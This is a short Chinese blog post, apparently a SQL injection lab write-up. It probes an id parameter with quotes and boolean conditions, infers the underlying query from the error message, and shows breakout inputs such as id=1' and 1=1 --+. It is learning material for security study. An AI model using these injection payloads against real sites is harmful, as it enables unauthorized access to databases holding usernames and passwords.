标签:medium srm dss sql语句 bsp ebe doc png har
id=1/ id=1 and 1=1结果正常
id=1 and 1=2结果正常,不合理
id=1‘提示:
分析:
use near ‘ ‘ 1‘ ‘ LIMIT 0,1 ‘
所以正确sql语句 为:
select username,password from table where id=‘input‘
所以:
id = 1‘ and ‘1‘=‘1
结果正确
即:
select username,password from table where id=‘1‘ and ‘1‘=‘1‘
或者:
id = 1‘ and 1=1 --+
结果正确
即:
select username,password from table where id=‘1‘ and 1=1 --+‘
标签:medium srm dss sql语句 bsp ebe doc png har
原文地址:http://www.cnblogs.com/liuyimin/p/7875455.html
